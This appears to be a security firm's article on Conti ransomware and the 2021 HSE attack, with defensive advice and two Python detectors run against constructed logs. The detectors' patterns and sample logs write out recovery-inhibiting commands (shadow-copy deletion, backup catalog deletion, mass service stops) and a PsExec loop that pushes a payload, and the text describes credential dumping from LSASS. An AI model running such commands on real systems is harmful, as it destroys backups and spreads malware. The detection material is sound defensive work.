Conti Ransomware: Facts, Figures and Advice
On Friday, 14th May, Conti ransomware hit the HSE (Health Service Executive) forcing them to shut down all of their IT systems, which still remain down as of today, Monday, 17th May. The outage has led to widespread disruption in Ireland’s healthcare system causing limited access to diagnostics and medical records and slow response times. The ransomware group have demanded a ransom of $20 million but the HSE have not yet advised whether they will be engaging with the hackers or not.
Ronan Murphy, CEO of Smarttech247, said: “A year ago, a back-up system was seen as a reasonable security measure against these incidents – but the blackmail situations surrounding the threat to leak information is a completely different scenario and one that is extremely difficult to tackle.”
What we know about Conti
Conti ransomware is believed to be run by a Russian-based cybercrime group known as Wizard Spider. The group uses phishing attacks to install the TrickBot and BazarLoader trojans, which provide remote access to the infected machine or machines. They then use this remote access to spread laterally through the network while stealing credentials and harvesting unencrypted data stored on workstations and servers. Once they have stolen everything of value and obtained Windows domain credentials, they wait, remaining undetected, until they strike and deploy the ransomware across the network to encrypt every device they can reach. The Conti gang then use the stolen data as leverage to force the victim to pay the ransom.
Conti is seen as a more sophisticated ransomware type because it is a “double-extortion” ransomware. In other words, where traditional ransomware encrypts files on a computer or system and then unlocks them when a ransom is paid, Conti additionally exfiltrates the data. As a result, the stolen data can then be used to demand a further ransom in exchange for not publishing the data on the dark web.
The original Conti is also human-operated ransomware: rather than automatically worming its way through a network, it is deployed and controlled interactively by the operators once they are inside.
Some high-profile ransomware attacks conducted by Conti in the past include FreePBX developer Sangoma, IoT chip maker Advantech, Broward County Public Schools (BCPS), and the Scottish Environment Protection Agency (SEPA). The attack on SEPA took place on Christmas Eve; the gang later published roughly 1.2 GB of stolen data on its dark web leak site. Our researchers have noted that the Conti News site has published data stolen from at least 180 victims thus far.
What our IR & forensics team have observed:
The Smarttech247 team have observed an increased rate of ransomware attacks during the last few months. Only a small number of ransomware families target the local network to encrypt over SMB. Conti's distinctive feature is that it accepts command line arguments directing it to encrypt the local hard drive, network shares, or even specific, targeted IP addresses. Conti has an extremely busy and loud methodology for stopping services and inhibiting recovery on the local system. While many ransomware families simply delete the Windows Volume Shadow Copies using vssadmin, Conti uses vssadmin in additional ways to ensure they are gone.
Additionally, the malware executes 160 individual commands, 146 of which are focused on stopping Windows services that might hold files open or protect them. The full command set closely mirrors the one found in the Ryuk ransomware family.
Conti also abuses the Windows Restart Manager to close applications and services that are currently running, so that the files they hold open become available for encryption and the damage is maximised. Once the system has been prepared and files have been identified, Conti walks each folder and encrypts files with AES-256, protecting the per-file key with a hard-coded public key, drops a ransom note named CONTI_README.txt, and appends the extension .CONTI to each encrypted file. Because the public key is embedded in the binary and the matching private key stays with the attackers, the malware can encrypt files even when it cannot contact its C2.
Overall, Conti represents a distinct twist in modern ransomware. Numerous families have been tracked that are designed to be driven by the adversary while on the network, with access gained through weak RDP exposure or vulnerable Internet-facing services. Conti shows an intent by the actor to also act on reconnaissance, singling out the servers in the environment where data encryption hurts most. Its multi-threaded implementation, together with the use of the Windows Restart Manager, makes for extremely quick and thorough encryption of data. The large-scale service termination supports this, targeting a vast array of applications found across small businesses and enterprises.
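The recovery inhibition and mass service stopping described above happen before any file is encrypted, so they are the point at which process-creation telemetry (Security Event ID 4688 or Sysmon Event ID 1) can still buy the defender time. The detector below is an added example written for this article; it is not Smarttech247's, Sophos' or Conti's code. The one-line log format, the hostnames, the account names and the command lines are constructed, and the shadow-storage resize pattern covers the vssadmin trick Conti and Ryuk use to force Windows to discard shadow copies without an explicit delete.

```python
"""Flag Conti-style pre-encryption staging from Windows process-creation
telemetry (Security Event ID 4688 or Sysmon Event ID 1).

Added example, not code from the article or from Conti. The one-line
log format, hostnames and command lines below are constructed; adapt
parse_line() to the field layout your SIEM exports."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Commands used to inhibit recovery. Keys are the finding names reported.
RECOVERY_INHIBIT = {
    "shadow_delete":  re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.I),
    # Conti/Ryuk shrink then re-grow shadow storage so Windows discards the copies
    "shadow_resize":  re.compile(r"vssadmin(\.exe)?\s+resize\s+shadowstorage", re.I),
    "wmic_shadow":    re.compile(r"wmic(\.exe)?\s+shadowcopy\s+delete", re.I),
    "backup_catalog": re.compile(r"wbadmin(\.exe)?\s+delete\s+(catalog|systemstatebackup)", re.I),
    "boot_recovery":  re.compile(r"bcdedit(\.exe)?\s+.*(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)", re.I),
}
# Service stops and process kills: individually benign, suspicious in bulk.
SERVICE_STOP = re.compile(r"\b(net1?(\.exe)?\s+stop|sc(\.exe)?\s+stop|taskkill(\.exe)?\s+.*/im)\b", re.I)

BURST_THRESHOLD = 10            # more than this many stops per host ...
WINDOW = timedelta(seconds=60)  # ... inside this window raises a burst finding

LINE_RE = re.compile(r"^(?P<ts>\S+)\s+host=(?P<host>\S+)\s+user=(?P<user>\S+)\s+cmd=(?P<cmd>.*)$")

def parse_line(line):
    """Parse one constructed log line; return None for lines that do not fit."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return {"ts": datetime.fromisoformat(m["ts"]), "host": m["host"],
            "user": m["user"], "cmd": m["cmd"]}

def analyse(lines):
    """Return {host: [(finding_name, detail), ...]} for hosts with findings."""
    findings = defaultdict(list)
    recent_stops = defaultdict(list)   # host -> timestamps of stop commands in WINDOW
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        for name, pattern in RECOVERY_INHIBIT.items():
            if pattern.search(ev["cmd"]):
                findings[ev["host"]].append((name, ev["cmd"]))
        if SERVICE_STOP.search(ev["cmd"]):
            q = recent_stops[ev["host"]]
            q.append(ev["ts"])
            while q and ev["ts"] - q[0] > WINDOW:   # slide the window forward
                q.pop(0)
            if len(q) == BURST_THRESHOLD + 1:       # report once when the threshold is crossed
                findings[ev["host"]].append(
                    ("service_stop_burst", f"{len(q)} stop/kill commands within {WINDOW.seconds}s"))
    return dict(findings)

# Constructed sample: a file server being prepared for encryption at 02:11,
# and a help-desk technician restarting the print spooler later that morning.
SERVICES = ["SQLSERVERAGENT", "MSSQLSERVER", "VeeamBackupSvc", "VeeamTransportSvc",
            "BackupExecJobEngine", "BackupExecAgentBrowser", "MSExchangeIS",
            "MSExchangeTransport", "AcronisAgent", "vmms", "wbengine", "SstpSvc"]
SAMPLE_LOG = [
    "2021-05-14T02:11:03 host=FILESERVER01 user=CORP\\svc_backup cmd=vssadmin.exe Delete Shadows /all /quiet",
    "2021-05-14T02:11:04 host=FILESERVER01 user=CORP\\svc_backup cmd=vssadmin.exe resize shadowstorage /for=c: /on=c: /maxsize=401MB",
    "2021-05-14T02:11:04 host=FILESERVER01 user=CORP\\svc_backup cmd=vssadmin.exe resize shadowstorage /for=c: /on=c: /maxsize=unbounded",
] + [
    f"2021-05-14T02:11:{5 + i:02d} host=FILESERVER01 user=CORP\\svc_backup cmd=net.exe stop \"{svc}\" /y"
    for i, svc in enumerate(SERVICES)
] + [
    "2021-05-14T09:30:00 host=WS-HR-07 user=CORP\\helpdesk cmd=net.exe stop spooler",
]

if __name__ == "__main__":
    for host, items in analyse(SAMPLE_LOG).items():
        for name, detail in items:
            print(f"{host}: {name}: {detail}")
```

Any single match in RECOVERY_INHIBIT is worth an alert on its own, since legitimate administration rarely deletes all shadow copies quietly or disables boot recovery; the service-stop burst is the signal that separates ransomware staging from a technician restarting one service. Tune BURST_THRESHOLD against your own patch and maintenance windows before relying on it.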
Conti best practice recommendations:
- Monitor your network security 24/7 and be aware of the early indicators of attack
- Shut down internet-facing remote desktop protocol (RDP) to deny cybercriminals access to networks. If you need access to RDP, put it behind a VPN connection and enforce the use of Multi-Factor Authentication (MFA)
- Educate employees on what to look out for in terms of phishing and malicious spam
- Introduce robust security policies
- Keep regular backups of your most important and current data on an offline storage device. The standard recommendation for backups is to follow the 3-2-1 method: 3 copies of the data, using 2 different systems, 1 of which is offline.
- Prevent attackers from getting access to and disabling your security: choose an advanced solution with a cloud-hosted management console with multi-factor authentication enabled and Role Based Administration to limit access rights.
- Have an effective Incident Response plan in place and make sure it is up-to-date.
If you are affected, we recommend the following actions be taken immediately:
The first thing you need to do is determine whether the attack is still underway. If you suspect it is, and you do not have the tools in place to stop it, determine which devices have been impacted and isolate them immediately. The easiest option is to simply unplug the network cable or turn off the Wi-Fi adapter. If the damage is more widespread than a few devices, consider doing this at the switch level and taking entire network segments offline instead of individual devices. Only shut down devices if you cannot disconnect the network: powering off destroys the memory-resident evidence (running processes, network connections, credentials in memory) that the forensic investigation will need.
Assess the damage:
- Which endpoints, servers and operating systems were affected, what has been lost?
- Are your backups still intact or has the attacker deleted them? If they are intact, make an offline copy immediately.
- Which machines were protected and remained clean? Knowing this is critical in getting you back on your feet.
Lastly, you will want to talk to people about what is happening, but the attackers may be eavesdropping so do not use your normal channels of communication. If the intruders have been in your network for a while, they will probably have access to email etc.
Find the root cause of the attack:
- The attackers have most likely been on your network for a few days or even weeks. Conti ransomware is operated by humans. They take time to prepare to ensure maximum disruption because this enables them to charge higher ransoms.
- The attackers could have used a variety of different methods to break into your network. Possible initial access methods for Conti ransomware include, but are not limited to, vulnerable firewalls, exposed RDP (Remote Desktop Protocol) services, and phishing for user credentials via spam emails. Sites like Shodan.io provide insight into what an attacker could find out about your network; try using it to search your external IP addresses.
- They will have secured access to domain admin accounts as well as other user accounts. Attackers typically compromise multiple accounts during an attack. Their main goal is to get access to domain admin accounts that can be used to launch the ransomware. However, they also target specific admin accounts that have access to sensitive data, backup systems, and security management consoles. Conti attackers often use tools like Mimikatz, which can extract the usernames and password hashes (and sometimes plaintext passwords) of currently logged-on users from the running LSASS.exe process. Sometimes attackers will leave this running and then deliberately break something on the machine they have targeted, provoking an admin to log in to fix it; the attackers can then capture that admin's credentials. If Mimikatz is blocked by security software, the attackers may instead use a legitimate tool such as Sysinternals Process Explorer or Task Manager's "Create dump file" option to write a memory dump of LSASS.exe, take the dump file back to their own machine, and extract the credentials from it offline with Mimikatz. With Mimikatz, it does not matter how long or complex the passwords are, because it takes them straight out of memory.
- The hackers will have scanned your network. They know how many servers and endpoints you have and where you keep your backups, business-critical data, and applications. One of the first things attackers will do when they get onto a network is identify what access they have on the local machine. The next step is to find out what remote machines exist and if they can access them. Attackers use legitimate network scanners like “Advanced Port Scanner” and “Angry IP Scanner” due to their effectiveness and the fact that they are unlikely to be blocked. These scanners will generate a list of IPs and machine names. This makes it easy for attackers to focus on critical infrastructure as most organizations helpfully give their servers descriptive names, for example NY-DC1 for the New York Domain Controller, or maybe even simpler names like “FileServer01,” “Backup_Server,” etc.
- The attackers are likely to have downloaded and installed backdoors that allow them to come and go on your network and install additional tools. They will have set up folders and directories to collect and store stolen information, and channels for communicating with the attackers' infrastructure and for moving information out of your network. The backdoors come in a variety of forms. Some just communicate back to the attackers' IP address, allowing them to send commands to the machine and receive the results. Many backdoors are in fact legitimate applications. For example, the attackers might use remote administration tools such as RDP to maintain access. Even if RDP is disabled by default, it is very easy for an attacker with admin access to the machine to re-enable it. Some attackers, including Conti, also set up Tor proxies so they can send command-and-control traffic over the Tor network. Such activity is often very hard to spot.
- In addition to the encryption of data and disruption to software and operations, Conti operators will try to exfiltrate hundreds of gigabytes of corporate data prior to the main ransomware event. Targets are threatened with the risk of their data being published on a so-called “leak site” for anybody to download unless they pay the ransom. Some of the more valuable data is often sold to other attackers to use in further attacks. Once a file server is identified, attackers often use a tool called “Everything” that enables very fast file searching for keywords, for example “account,” “confidential,” “Social Security number.” After they identify the data, there are numerous methods the attackers can use to steal it.
- They will have tried to encrypt, delete, reset, or uninstall your backups. Unless your backups are stored offline, they are within reach of the attackers. A “backup” that is online and available all the time is just a second copy of the files waiting to be encrypted.
- The attackers will have tried to identify what security solution is used on the network and whether they can disable it. It does not matter how good your protection is if the attacker can turn it off. Attackers also try to find and gain access to the management consoles of more advanced security solutions to disable all protection just before they launch the ransomware. Security management consoles hosted locally are especially at risk, as attackers could access them with the accounts they have already compromised.
- The most visible part of the attack, the release of the ransomware, probably took place when no IT admins or security professionals were online to notice and prevent the lengthy process of file encryption, possibly in the middle of the night or during the weekend. Note: the encryption process takes hours. An encrypted Windows endpoint will have tens or hundreds of thousands of encrypted files by the time the ransomware is done; for large file servers this can run into the millions. Therefore most targeted ransomware attacks are launched in the middle of the night, over a weekend or on a holiday, when fewer people are watching. Up to this point the attackers have been trying to stay hidden, but here their tactics change. They want you to know they are there and what they have done. They want you to see how much data has been lost and to understand that someone has done this maliciously and now wants a payment to decrypt the data. Therefore, in almost all ransomware attacks, encrypted files will have had a new extension appended to the end of the file name. For example, “MyReport.docx” might become “MyReport.docx.encrypted”; in Conti's case the appended extension is .CONTI. The ransom notes are often displayed prominently in multiple places, adding to the chaos and stress.
- The ransomware will have been deployed to all your endpoints and any servers that were online at the time of the attack, provided that is what the attacker wanted. The ransomware can be deployed in a variety of ways. One of the most common ways Sophos experts see is a combination of batch scripts and the Microsoft PsExec tool, a legitimate utility for executing commands on remote machines. An attacker might create a batch script that loops through a list of your IP addresses, using PsExec to copy the ransomware to each machine and then execute it.
- The launch of the ransomware is not the end. Using the backdoors they set up during the preparation stage, the attackers will often continue to monitor the situation, and even your email communications, to see how you respond. An email to the CEO stating you will be OK because they did not encrypt the backups on Server X could be a disaster if the attacker read it and still had access to that server. The attacker may also wait until you recover and then launch a second attack to really emphasise that they can keep doing this until you pay.
- The time spent in your network will likely have allowed the attackers to steal business-critical, sensitive, and confidential information that they now threaten to publicly expose. Some attackers also apply emotional pressure, with direct appeals and threats to employees over email and phone. Most attackers will start publishing stolen data anywhere from a few days to a week after the main attack if no contact from the target is received or the negotiations break down. However, it could be several weeks or even longer before anything gets published.
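The deployment step in the list above, a batch loop pushing the payload to every host with PsExec, leaves evidence on both ends: the source host records one psexec.exe launch per target, and every target's System log records the PSEXESVC helper service being installed (Event ID 7045). Joining the two is a quick way to establish the blast radius during the root-cause work described here. The detector below is an added example written for this article; it is not Smarttech247's, Sophos' or Conti's code. The log format, the hostnames, the IP addresses and the asset inventory used to map the attacker's IP list onto hostnames are all constructed.

```python
"""Spot a PsExec-driven ransomware push from two independent log sources:
one host launching psexec.exe against many targets in a short window
(Security 4688 / Sysmon 1), corroborated by the PSEXESVC helper service
being installed on those targets (System Event ID 7045).

Added example, not code from the article, Sophos or Conti. The log
format, hostnames, IPs and asset inventory below are constructed."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Source side: a psexec launch naming a remote target (\\host or \\ip).
PSEXEC_RE = re.compile(r"psexec(64)?(\.exe)?\s+\\\\(?P<target>[\w.\-]+)", re.I)
# Target side: PsExec drops and starts this service on every host it touches.
PSEXESVC = "psexesvc"

FAN_OUT_THRESHOLD = 5           # distinct targets from one source ...
WINDOW = timedelta(minutes=10)  # ... inside this window is a deployment loop

# Constructed asset inventory (assumption): the attacker's batch loop uses
# IPs, while the targets' System logs name hosts, so join them here.
ASSET_INVENTORY = {"10.0.1.21": "FS01", "10.0.1.22": "FS02", "10.0.1.23": "DC01",
                   "10.0.1.24": "APP01", "10.0.1.25": "APP02", "10.0.1.26": "SQL01"}

LINE_RE = re.compile(r"^(?P<ts>\S+)\s+EventID=(?P<eid>\d+)\s+host=(?P<host>\S+)\s+(?P<rest>.*)$")

def parse_line(line):
    """Parse one constructed log line; return None for lines that do not fit."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return {"ts": datetime.fromisoformat(m["ts"]), "eid": int(m["eid"]),
            "host": m["host"].upper(), "rest": m["rest"]}

def detect(lines):
    """Return one alert per source host whose psexec fan-out crosses the threshold."""
    launches = defaultdict(list)   # source host -> [(ts, target)]
    installs = defaultdict(list)   # target host -> [ts of PSEXESVC install]
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        if ev["eid"] in (1, 4688):
            m = PSEXEC_RE.search(ev["rest"])
            if m:
                target = ASSET_INVENTORY.get(m["target"], m["target"]).upper()
                launches[ev["host"]].append((ev["ts"], target))
        elif ev["eid"] == 7045 and PSEXESVC in ev["rest"].lower():
            installs[ev["host"]].append(ev["ts"])

    alerts = []
    for source, items in launches.items():
        items.sort()
        for i, (start, _) in enumerate(items):
            targets = {t for ts, t in items[i:] if ts - start <= WINDOW}
            if len(targets) >= FAN_OUT_THRESHOLD:
                # A target is "confirmed" if PSEXESVC was installed on it after the loop began.
                confirmed = sorted(t for t in targets
                                   if any(ts >= start for ts in installs.get(t, [])))
                alerts.append({"source": source, "start": start,
                               "targets": sorted(targets), "confirmed": confirmed})
                break   # one alert per source is enough for triage
    return alerts

# Constructed sample log.
SAMPLE_LOG = [
    # Routine use by an admin the previous morning: one target, no alert.
    "2021-05-13T10:02:11 EventID=4688 host=JUMP01 user=CORP\\itadmin cmd=psexec.exe \\\\APP01 -s cmd /c gpupdate /force",
    "2021-05-13T10:02:12 EventID=7045 host=APP01 ServiceName=PSEXESVC ImagePath=%SystemRoot%\\PSEXESVC.exe",
]
# The 02:20 deployment loop: copy the payload to each host and run it.
for i, ip in enumerate(ASSET_INVENTORY):
    SAMPLE_LOG.append(
        f"2021-05-14T02:20:{7 * i:02d} EventID=4688 host=JUMP01 user=CORP\\svc_backup "
        f"cmd=psexec.exe \\\\{ip} -accepteula -s -d cmd /c copy \\\\JUMP01\\c$\\temp\\upd.exe "
        f"C:\\Windows\\Temp\\upd.exe && C:\\Windows\\Temp\\upd.exe")
SAMPLE_LOG += [
    "2021-05-14T02:20:03 EventID=7045 host=FS01 ServiceName=PSEXESVC ImagePath=%SystemRoot%\\PSEXESVC.exe",
    "2021-05-14T02:20:10 EventID=7045 host=FS02 ServiceName=PSEXESVC ImagePath=%SystemRoot%\\PSEXESVC.exe",
    "2021-05-14T02:20:17 EventID=7045 host=DC01 ServiceName=PSEXESVC ImagePath=%SystemRoot%\\PSEXESVC.exe",
    "2021-05-14T02:25:00 EventID=7045 host=SQL01 ServiceName=Spooler ImagePath=C:\\Windows\\System32\\spoolsv.exe",
]

if __name__ == "__main__":
    for a in detect(SAMPLE_LOG):
        print(f"{a['source']} pushed to {len(a['targets'])} hosts from {a['start']}; "
              f"PSEXESVC confirmed on: {', '.join(a['confirmed']) or 'none'}")
```

Targets that appear in the launch list but have no matching PSEXESVC install are the ones to check first: either the push failed there (the machine was offline, which the list above notes the attackers rely on), or that host is not forwarding its System log and you have a visibility gap. The same fan-out logic applies to WMI and WinRM based pushes if you swap the source-side regex.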
Remember: While the attackers may promise to delete your information if you pay, you have no guarantees that they will.
Please reach out to us for a full list of IOCs and more information: email@example.com